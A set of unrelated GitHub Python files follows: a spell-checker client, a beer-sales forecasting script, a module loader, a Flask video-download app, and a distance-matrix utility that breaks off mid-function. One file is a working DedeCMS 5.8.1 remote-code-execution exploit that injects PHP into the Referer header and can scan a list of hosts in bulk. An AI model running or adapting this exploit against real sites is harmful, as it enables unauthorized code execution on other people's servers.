'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'referer': 'https://search.naver.com/',
}
r = _agent.get(base_url, params=payload, headers=headers)
r = r.text[42:-2]
data = json.loads(r)
html = data['message']['result']['html']
tmp_result.append(html)
final_result.extend(tmp_result)
return '<br>'.join(final_result)
else:
payload = {
'_callback': 'window.__jindo2_callback._spellingCheck_0',
'q': text
}
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'referer': 'https://search.naver.com/',
}
r = _agent.get(base_url, params=payload, headers=headers)
r = r.text[42:-2]
data = json.loads(r)
html = data['message']['result']['html']
return html | SeongMyo/Spell_Checker_plus | utils/spell_checker.py | spell_checker.py | py | 2,669 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.Session",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "sentence_cutting.cutting_500_under",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "json.l... |
34697431338 | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 20 06:20:43 2022
@author: beauw
"""
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import itertools
from pandas import to_datetime
from prophet import Prophet
from pandas import DataFrame
from matplotlib import pyplot
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
from sklearn import preprocessing
from prophet.diagnostics import cross_validation
from prophet.diagnostics import performance_metrics
from prophet.plot import plot_cross_validation_metric
from sklearn.decomposition import PCA
# Import raw data sets. Then, combine variables into one mother dataframe.
#########################################################################
# Import demographics of customers living in the region of each wholesaler.
demographics = pd.read_csv()
# Major events - such as holidays, Superbowl, big soccer games, etc.
major_events = pd.read_csv()
# Change YearMonth to Date/Time
major_events['YearMonth'] = pd.to_datetime(
major_events['YearMonth'], format='%Y%m')
# Historical volume of each SKU
historical_volume = pd.read_csv()
# Change YearMonth to Date/Time
historical_volume['YearMonth'] = pd.to_datetime(
historical_volume['YearMonth'], format='%Y%m')
# Overall industry soda sales
industry_soda_sales = pd.read_csv()
# Change YearMonth to Date/Time
industry_soda_sales['YearMonth'] = pd.to_datetime(
industry_soda_sales['YearMonth'], format='%Y%m')
# Overall industry beer volume
industry_volume = pd.read_csv()
# Change Yearmonth to Date/Time
industry_volume['YearMonth'] = pd.to_datetime(
industry_volume['YearMonth'], format='%Y%m')
# Any promotions matched up to Year Month
price_sales_promotion = pd.read_csv()
# Change YearMonth to Date/Time
price_sales_promotion['YearMonth'] = pd.to_datetime(
price_sales_promotion['YearMonth'], format='%Y%m')
# Average temperature of YearMonth in relation to each wholesaler's region
weather = pd.read_csv()
# Change YearMonth to Date/Time
weather['YearMonth'] = pd.to_datetime(weather['YearMonth'], format='%Y%m')
# Merge all variables that depend on SKUs into one data frame - stacking
# on top of Agency, SKU, and then YearMonth
sku_dataframe = historical_volume.merge(
price_sales_promotion, on=['Agency', 'SKU', 'YearMonth'], how='left')
sku_dataframe = sku_dataframe.merge(
industry_soda_sales, on=['YearMonth'], how='left')
sku_dataframe = sku_dataframe.merge(
industry_volume, on=['YearMonth'], how='left')
sku_dataframe = sku_dataframe.merge(major_events, on=['YearMonth'], how='left')
# Merge all variables that depend on Agencies (AKA distributors) by eliminating duplicates
Agency_dataframe = weather.merge(demographics, on=['Agency'], how='left')
# Let's take a look at all the Agencies
#week4_dataframe_agencies = Agency_dataframe.copy()
#week4_dataframe_agencies = week4_dataframe_agencies.groupby('Agency')
# This does not perform well in the Spyder IDE
# Merge both major dataframes (ones depending on SKUs and on Agencies) into one big dataframe
mother_dataframe = sku_dataframe.merge(
Agency_dataframe, on=['YearMonth', 'Agency'], how='left')
# Turn the categorical SKU data into booleans columns instead. Also making
#a data frame for a PCA run.
PCAmother_df = mother_dataframe.copy()
mother_dataframe = pd.get_dummies(
mother_dataframe, columns=['SKU'], dummy_na=False)
# Check on null values in the newly formed large dataframe. Let's also check
# out the statistics.
mother_dataframe.isnull().sum()
# Import the testing data now...
testing_dataframe = pd.read_csv(
r'C:\Users\beauw\OneDrive\Desktop\Machine Learning\OSU - Data Mining Project\volume_forecast.csv')
# Visualize variables graphically that may relate with volume
# plt.scatter(mother_dataframe['Avg_Max_Temp'],mother_dataframe['Volume'])
# plt.scatter(mother_dataframe['Promotions'],mother_dataframe['Volume'])
# Let's drop the Fifa World Cup and Football Gold cup due to 0 value
# contributions.
mother_dataframe.drop(
columns=['FIFA U-17 World Cup', 'Football Gold Cup'], inplace=True)
#Making a data frame for just SKU1 and Agency 1
agency1_SKU1_df = mother_dataframe.copy()
agency1_SKU1_df.query(
'Agency == "Agency_01" and SKU_SKU_01 == 1', inplace=True)
agency1_SKU1_df.drop('SKU_SKU_02', axis=1, inplace=True)
agency1_SKU1_df.drop('SKU_SKU_01', axis=1, inplace=True)
#####################################################################
#####################################################################
#####################################################################
# Create a heatmap of all variables - take a close note of volume correlation
corr = mother_dataframe[mother_dataframe.columns[:21]].corr()
plt.figure(figsize=(12, 12))
sns.heatmap(corr, vmin=-1, cmap='BuPu', annot=True, fmt=".2f")
plt.show()
######################################################################
# Create a factor plot against time and volume with various variables
##THIS TAKES SERIOUS TIME AND CPU USEAGE (Thus the #s)!!
#sns.catplot(x ='YearMonth', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Price', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Promotions', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Avg_Population_2017', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Avg_Yearly_Household_Income_2017', y ='Volume', data = mother_dataframe)
# These all took a very long time to process. Saved plot pictures for later use.
######################################################################
#Find optimal number of components for ALL data using PCA. I also stacked and
#scaled the SKU data back into one column for this input.
label_encoder = preprocessing.LabelEncoder()
PCAprescaled = PCAmother_df.copy()
PCAprescaled.drop(PCAprescaled.loc[:,'Easter Day':'Music Fest'], axis=1, inplace=True)
SS = StandardScaler()
PCAprescaled['Agency'] = label_encoder.fit_transform(PCAprescaled['Agency'])
PCAprescaled['YearMonth'] = label_encoder.fit_transform(PCAprescaled['YearMonth'])
PCAprescaled['SKU'] = label_encoder.fit_transform(PCAprescaled['SKU'])
PCAscaled = SS.fit_transform(PCAprescaled)
PCAmodel = PCA(random_state=5000).fit(PCAscaled)
plt.plot(PCAmodel.explained_variance_ratio_,
linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance')
plt.show()
#cumulitive run
plt.plot(np.cumsum(PCAmodel.explained_variance_ratio_),
linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance Cumulative')
plt.show()
#optimal number of components for just SKU1 and Agency 1
PCAprescaled2 = agency1_SKU1_df.copy()
PCAprescaled2.drop(PCAprescaled2.iloc[:,8:17], axis=1, inplace=True)
PCAprescaled2.drop('Agency', axis=1, inplace=True)
SS = StandardScaler()
PCAprescaled2['YearMonth'] = label_encoder.fit_transform(PCAprescaled2['YearMonth'])
PCAscaled2 = SS.fit_transform(PCAprescaled2)
PCAmodel2 = PCA(random_state=5000).fit(PCAscaled2)
plt.plot(PCAmodel2.explained_variance_ratio_,
linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance')
plt.show()
#cumulitive run
plt.plot(np.cumsum(PCAmodel2.explained_variance_ratio_),
linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance Cumulative')
plt.show()
######################################################################
# WCSS Elbow method - then plot KMeans
# After looking at WCSS, the only viable options seem to be pricing
# And promotions.
# Pricing first. I am encoding YearMonth column to include dates as variables
mother_df_Seq = mother_dataframe.copy()
mother_df_Seq0 = mother_dataframe.copy()
label_encoder = preprocessing.LabelEncoder()
mother_df_Seq0['YearMonth'] = label_encoder.fit_transform(mother_df_Seq0['YearMonth'])
price_trans_x = mother_df_Seq0.iloc[:, [1, 2, 3]].values
Standard_Scale = StandardScaler()
Standard_Scale.fit_transform(price_trans_x[:,1:3])
wcss = []
for i in range(1, 11):
pricekmeans = KMeans(n_clusters=i, init='k-means++', random_state=42)
pricekmeans.fit(price_trans_x)
wcss.append(pricekmeans.inertia_)
plt.figure(figsize=(10, 5))
sns.lineplot(wcss, marker='o', color='red')
plt.title('Elbow Fit')
plt.xlabel('Price - Number of Clusters')
plt.ylabel('WCSS')
plt.show()
# Unique labels for the cluster centroids
price_y_kmeans = KMeans(n_clusters=2, init='k-means++',
max_iter=300, n_init=10, random_state=0)
price_z_kmeans = price_y_kmeans.fit_predict(price_trans_x)
price_u_labels = np.unique(price_z_kmeans)
print(price_u_labels)
# Plot the centroids
plt.scatter(price_trans_x[price_z_kmeans == 0, 0],
price_trans_x[price_z_kmeans == 0, 1], s=100, c='red', label='Cluster 1')
plt.scatter(price_trans_x[price_z_kmeans == 1, 0],
price_trans_x[price_z_kmeans == 1, 1], s=100, c='blue', label='Cluster 2')
#plt.scatter(price_trans_x[price_z_kmeans == 2, 0],
#price_trans_x[price_z_kmeans == 2, 1], s=100, c='green', label='Cluster 3')
#plt.scatter(price_trans_x[price_z_kmeans==3, 0], price_trans_x[price_z_kmeans==3, 1], s=100, c='cyan', label ='Cluster 4')
plt.scatter(price_y_kmeans.cluster_centers_[:, 0], price_y_kmeans.cluster_centers_[
:, 1], s=300, c='yellow', label='Centroids')
plt.title('Clusters of Pricing')
plt.xlabel('Pricing ')
plt.ylabel('Volume')
plt.show()
# Now Promotions..
promo_trans_x = mother_df_Seq0.iloc[:, [1, 2, 5]].values
Standard_Scale.fit_transform(promo_trans_x[[1]])
Standard_Scale.fit_transform(promo_trans_x[[2]])
Standard_Scale.fit_transform(promo_trans_x[[5]])
wcss = []
for i in range(1, 11):
promokmeans = KMeans(n_clusters=i, init='k-means++', random_state=42)
promokmeans.fit(promo_trans_x)
wcss.append(promokmeans.inertia_)
plt.figure(figsize=(10, 5))
sns.lineplot(wcss, marker='o', color='red')
plt.title('Elbow Fit')
plt.xlabel('Promotions - Number of Clusters')
plt.ylabel('WCSS')
plt.show()
# Unique labels for the cluster centroids
promo_y_kmeans = KMeans(n_clusters=2, init='k-means++',
max_iter=300, n_init=10, random_state=0)
promo_z_kmeans = promo_y_kmeans.fit_predict(promo_trans_x)
promo_u_labels = np.unique(promo_z_kmeans)
print(promo_u_labels)
# Plot the centroids
plt.scatter(promo_trans_x[promo_z_kmeans == 0, 0],
promo_trans_x[promo_z_kmeans == 0, 1], s=100, c='red', label='Cluster 1')
plt.scatter(promo_trans_x[promo_z_kmeans == 1, 0],
promo_trans_x[promo_z_kmeans == 1, 1], s=100, c='blue', label='Cluster 2')
#plt.scatter(promo_trans_x[promo_z_kmeans == 2, 0],
#promo_trans_x[promo_z_kmeans == 2, 1], s=100, c='green', label='Cluster 3')
plt.scatter(promo_y_kmeans.cluster_centers_[:, 0], promo_y_kmeans.cluster_centers_[
:, 1], s=300, c='yellow', label='Centroids')
plt.title('Clusters of Promotions')
plt.xlabel('Promotions')
plt.ylabel('Volume')
plt.show()
# Let's do Sales, Pricing, Promotions, Volume, Yearly Household Income, and
# Average Population via multi-Kmeans clustering. See if all these together
#does anything...
mother_df_Seq = mother_dataframe.copy()
mother_df_Seq.drop(
mother_df_Seq.loc[:, 'Soda_Volume':'Avg_Max_Temp'], axis=1, inplace=True)
mother_df_Seq.drop(
mother_df_Seq.loc[:, 'SKU_SKU_01':'SKU_SKU_34'], axis=1, inplace=True)
mother_df_Seq.drop('Agency', axis=1, inplace=True)
mother_df_Seq['YearMonth'] = label_encoder.fit_transform(mother_df_Seq['YearMonth'])
#mother_df_Seq.drop('YearMonth', axis=1, inplace=True)
SS = StandardScaler()
Blob_df = SS.fit_transform(mother_df_Seq.iloc[:,0:7])
blob_trans_x = Blob_df
wcss = []
for i in range(1, 11):
blobkmeans = KMeans(n_clusters=i, init='k-means++', random_state=42)
blobkmeans.fit(blob_trans_x)
wcss.append(blobkmeans.inertia_)
plt.figure(figsize=(10, 5))
sns.lineplot(wcss, marker='o', color='red')
plt.title('Elbow Fit - Lotta Variables')
plt.xlabel('Lotta Variables - Number of Clusters')
plt.ylabel('WCSS')
plt.show()
cluster_results = pd.DataFrame(Blob_df, columns=['YearMonth','Volume', 'Price', 'Sales',
'Promotions', 'Avg_Population_2017',
'Avg_Yearly_Household_Income_2017'])
blob_kmeans = KMeans(n_clusters=4)
y = blob_kmeans.fit_predict(cluster_results[['YearMonth','Volume', 'Price', 'Sales',
'Promotions', 'Avg_Population_2017',
'Avg_Yearly_Household_Income_2017']])
y2 = pd.DataFrame(y, columns=[0])
cluster_results['Cluster_Results'] = y2
plt.scatter(blob_trans_x[y == 0, 0],
blob_trans_x[y == 0, 1], s=100, c='red', label='Cluster 1')
plt.scatter(blob_trans_x[y == 1, 0],
blob_trans_x[y == 1, 1], s=100, c='blue', label='Cluster 2')
plt.scatter(blob_trans_x[y == 2, 0],
blob_trans_x[y == 2, 1], s=100, c='green', label='Cluster 3')
plt.scatter(blob_trans_x[y == 3, 0],
blob_trans_x[y == 3, 1], s=100, c='orange', label='Cluster 4')
plt.scatter(blob_kmeans.cluster_centers_[:, 0], blob_kmeans.cluster_centers_[
:, 1], s=100, c='yellow', label='Centroids')
plt.title('Clusters of a Bunch of Variables')
plt.xlabel('Variables')
plt.ylabel('Y')
plt.show()
# KMeans now completed for Promotions and Pricing.
######################################################################
######################################################################
######################################################################
######################################################################
######################################################################
######################################################################
# Creating 3 separate Prophet algorithms, which will make a new dataframe
# with industry volume, soda volume, and avg temperature.
### in order to prepare Prophet for making a prediction of SKU 1 and Agency 1
prophet_feed_df = mother_dataframe.copy()
prophet_feed_soda = prophet_feed_df[['YearMonth', 'Soda_Volume']]
prophet_feed_industry = prophet_feed_df[['YearMonth', 'Industry_Volume']]
# For the weather forecast, we will need to train algorithms on all of
# agency 1's data only (regardless of SKU. Filtering out the rest of the agencies...
prophet_feed_weather = prophet_feed_df[['YearMonth', 'Avg_Max_Temp', 'Agency']]
prophet_feed_weather.query('Agency == "Agency_01"', inplace=True)
prophet_feed_weather.drop('Agency', axis=1, inplace=True)
# Assign Prophet friendly names to variables in both data sets.
# Change time to date-time format.
prophet_feed_soda.columns = ['ds', 'y']
prophet_feed_soda['ds'] = to_datetime(prophet_feed_soda['ds'])
prophet_feed_industry.columns = ['ds', 'y']
prophet_feed_industry['ds'] = to_datetime(prophet_feed_industry['ds'])
prophet_feed_weather.columns = ['ds', 'y']
prophet_feed_weather['ds'] = to_datetime(prophet_feed_weather['ds'])
# Label the Meta Prophet algorithm for each variable
industry_prophet = Prophet()
industry_prophet.fit(prophet_feed_industry)
soda_prophet = Prophet()
soda_prophet.fit(prophet_feed_soda)
weather_prophet = Prophet()
weather_prophet.fit(prophet_feed_weather)
# Combine all futures data and evaluate the three Prophets' predictions.
#### Build a Future forecast dataframe for the soda prophet predict.
sodafuture = list()
for s in range(1, 13):
sodadate = '2018-%02d' % s
sodafuture.append([sodadate])
sodafuture = DataFrame(sodafuture)
sodafuture.columns = ['ds']
sodafuture['ds'] = to_datetime(sodafuture['ds'])
#Build Soda Meta Prophet model
### Insert top rated parameters for Soda model
soda_param_grid = {
'changepoint_prior_scale': [0.0001],#This is the lowest value in MAPE reduction
'seasonality_prior_scale': [0.001],#This is the lowest value in MAPE reduction
}
soda_all_params = [dict(zip(soda_param_grid.keys(),
sod)) for sod in itertools.product(*soda_param_grid.values())]
for sparams in soda_all_params:
soda_prophet = Prophet(**sparams).fit(prophet_feed_soda)
# Make Soda prediction dataframe.
sodaforecast = soda_prophet.predict(sodafuture)
# Plot the overall beer industry prediction from Soda Prophet
soda_prophet.plot(sodaforecast)
pyplot.show()
# Evaluate performance of the Soda Prophet
soda_crossval = cross_validation(soda_prophet, initial='1095 days', period='31 days', horizon = '365 days')
soda_prophet_performance = performance_metrics(soda_crossval)
soda_fig_performance = plot_cross_validation_metric(soda_crossval, metric='mape')
#### Build a Future forecast dataframe for the industry prophet predict.
industryfuture = list()
for b in range(1, 13):
industrydate = '2018-%02d' % b
industryfuture.append([industrydate])
industryfuture = DataFrame(industryfuture)
industryfuture.columns = ['ds']
industryfuture['ds'] = to_datetime(industryfuture['ds'])
#Build Industry Meta Prophet model
### Insert top rated parameters for Industry model
industry_param_grid = {
'changepoint_prior_scale': [0.0001], #This is the lowest value in MAPE reduction
'seasonality_prior_scale': [0.001], #This is the lowest value in MAPE reduction
}
industry_all_params = [dict(zip(industry_param_grid.keys(),
ind)) for ind in itertools.product(*industry_param_grid.values())]
for iparams in industry_all_params:
industry_prophet = Prophet(**iparams).fit(prophet_feed_industry)
# Make industry prediction dataframe.
industryforecast = industry_prophet.predict(industryfuture)
# Plot the overall beer industry prediction from iIndustry Prophet
industry_prophet.plot(industryforecast)
pyplot.show()
# Evaluate performance of the industry Prophet
industry_crossval = cross_validation(industry_prophet, initial='1095 days', period='31 days', horizon = '365 days')
industry_prophet_performance = performance_metrics(industry_crossval)
industry_fig_performance = plot_cross_validation_metric(industry_crossval, metric='mape')
# Build a Future forecast dataframe for the weather prophet predict.
weatherfuture = list()
for c in range(1, 13):
weatherdate = '2018-%02d' % c
weatherfuture.append([weatherdate])
weatherfuture = DataFrame(weatherfuture)
weatherfuture.columns = ['ds']
weatherfuture['ds'] = to_datetime(weatherfuture['ds'])
#Build weather Meta Prophet model
### Insert top rated parameters for weather model
weather_param_grid = {
'changepoint_prior_scale': [0.01],#This is the lowest value in MAPE reduction
'seasonality_prior_scale': [0.01],#This is the lowest value in MAPE reduction
'holidays_prior_scale': [0.0001],
}
weather_all_params = [dict(zip(weather_param_grid.keys(),
wet)) for wet in itertools.product(*weather_param_grid.values())]
for wparams in weather_all_params:
weather_prophet = Prophet(**wparams).fit(prophet_feed_weather)
# Make weather prediction dataframe.
weatherforecast = weather_prophet.predict(weatherfuture)
# Plot the overall beer weather prediction from weather Prophet
weather_prophet.plot(weatherforecast)
pyplot.show()
#Crossval weather Prophet
weatherforecast = weather_prophet.predict(weatherfuture)
weather_crossval = cross_validation(weather_prophet,initial='1095 days', period='31 days', horizon = '365 days')
weather_prophet_performance = performance_metrics(weather_crossval)
weather_fig_performance = plot_cross_validation_metric(weather_crossval, metric='mape')
#########################################################################
# Start merging all predictions onto one data frame,
#and change names of columns for final volume predict.
Futures_df = weatherforecast[['ds', 'yhat']]
Futures_df = Futures_df.rename(columns={'yhat': 'Avg_Max_Temp'})
Futures_df.insert(2, 'yhat', industryforecast['yhat'])
Futures_df = Futures_df.rename(columns={'yhat': 'Industry_Volume'})
Futures_df.insert(3, 'yhat', sodaforecast['yhat'])
Futures_df = Futures_df.rename(columns={'yhat': 'Soda_Volume'})
Futures_df = Futures_df.rename(columns={'YearMonth': 'ds'})
##########################################################################
##Here is the most important part of the whole coding: the last prophet
#That will predict volume based on other prophet algorithm results.
a1s1_prophet_feed = agency1_SKU1_df[['YearMonth','Volume','Avg_Max_Temp',
'Industry_Volume',
'Soda_Volume']]
a1s1_prophet_feed = a1s1_prophet_feed.rename(columns={'YearMonth': 'ds'})
a1s1_prophet_feed = a1s1_prophet_feed.rename(columns={'Volume': 'y'})
a1s1_prophet = Prophet()
a1s1_prophet.add_regressor('Avg_Max_Temp')
a1s1_prophet.add_regressor('Industry_Volume')
a1s1_prophet.add_regressor('Soda_Volume')
### Add hyper parameter tuning.
a1s1_param_grid = {
'changepoint_prior_scale': [1.6],
'seasonality_prior_scale': [0.1],
#'changepoints': ['2013-10-01','2014-10-01','2015-10-01','2016-10-01','2017-10-01'],
#'seasonality_mode': ['multiplicative'],
'changepoint_range': [0.95],
}
# Generate all combinations of parameters, for a1s1 Prophet
a1s1_all_params = [dict(zip(a1s1_param_grid.keys(),
a1s1)) for a1s1 in itertools.product(*a1s1_param_grid.values())]
# Implement all parameters into algorithm
for a1s1params in a1s1_all_params:
a1s1_prophet = Prophet(**a1s1params).fit(a1s1_prophet_feed)
a1s1forecast = a1s1_prophet.predict(Futures_df)
#Plot the overall volume prediction from a1s1 Prophet
a1s1_prophet.plot(a1s1forecast)
pyplot.show()
#Crossval a1s1 Prophet
a1s1forecast = a1s1_prophet.predict(Futures_df)
a1s1_crossval = cross_validation(a1s1_prophet, initial='1095 days', period='31 days', horizon = '31 days')
a1s1_prophet_performance = performance_metrics(a1s1_crossval)
a1s1_fig_performance = plot_cross_validation_metric(a1s1_crossval, metric='mape')
#Final prediction 1 month
print(a1s1forecast.head(1))
| SpeciesXBeer/BeerVolumeProphet | Entire Beer Volume Forecase .py | Entire Beer Volume Forecase .py | py | 22,300 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "pandas.to_datetime",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
... |
71782650344 | #!/usr/bin/env python
# -*- conding:utf-8 -*-
import requests
import argparse
import sys
import urllib3
import re
from prettytable import PrettyTable
urllib3.disable_warnings()
def title():
print("""
Dedecms_5.8.1 代码执行漏洞
Use:python3 dedecms_5.8.1_RCE.py
Author: Henry4E36
Github:https://github.com/Henry4E36/dedecms_5.8.1_RCE
""")
class Information(object):
def __init__(self, args):
self.args = args
self.url = args.url
self.file = args.file
def target_url(self):
target_url = self.url + "/plus/flink.php?dopost=save"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
"Referer": '<?php "system"(id);?>'
}
try:
res = requests.get(url=target_url,headers=headers,verify=False,timeout=5)
if "uid" in res.text and res.status_code == 200:
pattern = re.compile(r"location='(.*)")
cmd_id = pattern.findall(res.text)[0]
return self.url, True, cmd_id
else:
return self.url, False, "NULL"
except Exception as e:
return self.url, "Error", e
def file_url(self):
file_results = []
with open(self.file, "r") as urls:
for url in urls:
url = url.strip()
if url[:4] != "http":
url = "http://" + url
self.url = url.strip()
result = Information.target_url(self)
file_results.append(result)
return file_results
if __name__ == "__main__":
title()
parser = argparse.ArgumentParser(description='Dedecms_5.8.1 代码执行漏洞')
parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:\"ip.txt\"")
args = parser.parse_args()
if len(sys.argv) != 3:
print(
"[-] 参数错误!\neg1:>>>python3 dedecms_5.8.1_RCE.py -u http://127.0.0.1\neg2:>>>python3 dedecms_5.8.1_RCE.py -f ip.txt")
elif args.url:
results = Information(args).target_url()
if results[1] is True:
print(f"\033[31m[{chr(8730)}] 目标系统: {results[-1]} 存在代码执行漏洞!\033[0m")
print(f"[{chr(8730)}] 响应为:{results[1]}")
elif results[1] is False:
print(f"[\033[31mx\033[0m] 目标系统: {results[-1]} 不存在代码执行漏洞!")
print("[" + "-" * 100 + "]")
elif results[1] == "Error":
print("[\033[31mX\033[0m] 连接错误!")
print("[" + "-"*100 + "]")
elif args.file:
results = Information(args).file_url()
k = 0
table = PrettyTable(['序号', '地址', '有无漏洞', '响应'])
for i in results:
if i[1] is True:
table.add_row([k+1, i[0], i[1], i[2]])
k = k + 1
elif i[1] is False:
table.add_row([k+1, i[0], i[1], i[2]])
k = k + 1
elif i[1] == "Error":
table.add_row([k+1, i[0], i[1], i[2]])
k = k + 1
print(table)
| Henry4E36/dedecms_5.8.1_RCE | dedecms_5.8.1_RCE.py | dedecms_5.8.1_RCE.py | py | 3,462 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "urllib3.disable_warnings",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentPars... |
25852270022 | """Functions for dynamically loading modules and functions.
"""
import importlib
import os
__author__ = 'Hayden Metsky <hayden@mit.edu>'
def load_module_from_path(path):
"""Load Python module in the given path.
Args:
path: path to .py file
Returns:
Python module (before returning, this also executes
the module)
"""
path = os.path.abspath(path)
# Use the filename (without extension) as the module name
_, filename = os.path.split(path)
module_name, _ = os.path.splitext(filename)
spec = importlib.util.spec_from_file_location(module_name, path)
module = importlib.util.module_from_spec(spec)
# Execute the module
spec.loader.exec_module(module)
return module
def load_function_from_path(path, fn_name):
"""Load Python function in a module at the given path.
Args:
path: path to .py file
fn_name: name of function in the module
Returns:
Python function
Raises:
Exception if the module at path does not contain a function
with name fn_name
"""
module = load_module_from_path(path)
if not hasattr(module, fn_name):
raise Exception(("Module at %s does not contain function %s" %
(path, fn_name)))
return getattr(module, fn_name)
| broadinstitute/catch | catch/utils/dynamic_load.py | dynamic_load.py | py | 1,312 | python | en | code | 63 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "os.path.split",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number... |
71785754983 | #!/usr/bin/python3
import datetime
import flask
from . import client
from . import session
bp = flask.Blueprint("main", __name__)
def format_time(seconds):
return str(datetime.timedelta(seconds=seconds))
def format_size(size):
for unit in ["B","KB","MB","GB"]:
if abs(size) < 1024.0:
return "%3.1f%s" % (size, unit)
size /= 1024.0
@bp.route("/", methods=["GET", "POST"])
def index():
with client.Client() as flask.g.client:
context = {
"format_time": format_time,
"format_size": format_size
}
if flask.request.method == "POST":
address = flask.request.form["address"]
context["address"] = address
context["meta"] = flask.g.client.metadata(address)
return flask.render_template("index.html", **context)
@bp.route("/status")
def status():
with client.Client() as flask.g.client, session.Session() as flask.g.session:
downloads = flask.g.client.get_downloads()
required_directories = flask.g.session.get_directories()
existing_directories = set()
for download in downloads:
if download["directory"] in required_directories:
existing_directories.add(download["directory"])
download["hidden"] = False
else:
download["hidden"] = True
flask.g.session.set_directories(existing_directories)
context = {
"downloads": downloads,
"format_size": format_size
}
return flask.render_template("status.html", **context)
@bp.route("/download", methods=["POST"])
def download():
with client.Client() as flask.g.client, session.Session() as flask.g.session:
address = flask.request.form["address"]
video_format = flask.request.form["video_format"]
audio_format = flask.request.form["audio_format"]
format = video_format + "+" + audio_format
format = format.strip("+")
if not format:
format = None
directory = flask.g.client.download(address, format)
flask.g.session.get_directories().add(directory)
return flask.redirect(flask.url_for(".index"))
@bp.route("/restart", methods=["POST"])
def restart():
with client.Client() as flask.g.client:
flask.g.client.exit()
return flask.redirect(flask.url_for(".index"))
| jakub-vanik/youtube-ripper | http/ripper/main.py | main.py | py | 2,200 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Blueprint",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask.g",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"l... |
1914874686 | import math
from distributed import Client
from tqdm import tqdm
import numpy as np
import pandas as pd
def calculate_distance_between_queries(data_df, queries, metric, dask_client: Client= None, n_blocks = None):
involved_instances = np.unique(queries, axis = None)
relevant_data = data_df.reset_index(drop=True).loc[involved_instances]
chunks = np.array_split(queries, n_blocks)
if dask_client is None:
results = [_calculate_pair_list(task, metric, relevant_data) for task in tqdm(chunks, desc='calculating distances')]
else:
data_df_future = dask_client.scatter(relevant_data, broadcast=True)
futures = dask_client.map(_calculate_pair_list, chunks, metric = metric, data_df = data_df_future)
results = dask_client.gather(futures)
# collect the results in a distance matrix
n_series = relevant_data.shape[0]
dist_matrix = np.full((n_series, n_series), np.nan)
dist_matrix = pd.DataFrame(dist_matrix, index = relevant_data.index, columns = relevant_data.index)
for chunk, result in zip(chunks, results):
for (i1,i2), r in zip(chunk, result):
dist_matrix.loc[i1, i2] = r
dist_matrix.loc[i2, i1] = r
# make into df with original index
distance_df = pd.DataFrame(dist_matrix.to_numpy(), index= data_df.index[involved_instances], columns = data_df.index[involved_instances])
return distance_df
def calculate_full_distance_matrix(data_df, metric, dask_client:Client=None, n_blocks = None):
"""
calculates the distance matrix for the given data_df
"""
if n_blocks is None:
if dask_client is not None:
n_blocks = len(dask_client.scheduler_info()['workers'])*10
else:
n_blocks = 1
# Make the tasks
n_series = data_df.shape[0]
print('generating blocks')
blocks = _generate_blocks(n_series, n_blocks)
# tasks = [(data_df.iloc[row_start: row_end,:],data_df.iloc[column_start:column_end]) for
# (row_start, row_end), (column_start, column_end) in tqdm(blocks, desc='Making blocks')]
print('calculating blocks')
# execute the tasks
if dask_client is None:
results = [_calculate_block(task, metric, data_df) for task in tqdm(blocks, desc='Calculating distances')]
else:
data_df_future = dask_client.scatter(data_df, broadcast = True)
futures = dask_client.map(_calculate_block, blocks, metric = metric, data_df = data_df_future)
results = dask_client.gather(futures)
# gather the results
dist_matrix = np.zeros((n_series, n_series))
for result, block in zip(results, blocks):
dist_matrix[block[0][0]: block[0][1], block[1][0]:block[1][1]] = result
# make upper triangular matrix into full symmetrical distance matrix
dist_matrix[np.triu_indices(data_df.shape[0], k=1)] = 0
dist_matrix = dist_matrix + dist_matrix.T
# make into a nice dataframe
distance_df = pd.DataFrame(dist_matrix, index=data_df.index, columns=data_df.index)
return distance_df
def _generate_blocks(nb_series, total_blocks=500):
"""
A util function that divides the full matrix into several (equally-sized) blocks that can be calculated in parallel
The function won't generate 'total_blocks' directly but will simply try to find a number close enough
Returns a list of (start_row, end_row),(start_col, end_col)
"""
blocks_each_dimension = math.ceil(math.sqrt(total_blocks))
profiles_per_block = math.ceil(nb_series / blocks_each_dimension)
blocks = []
for row_start in range(0, nb_series, profiles_per_block):
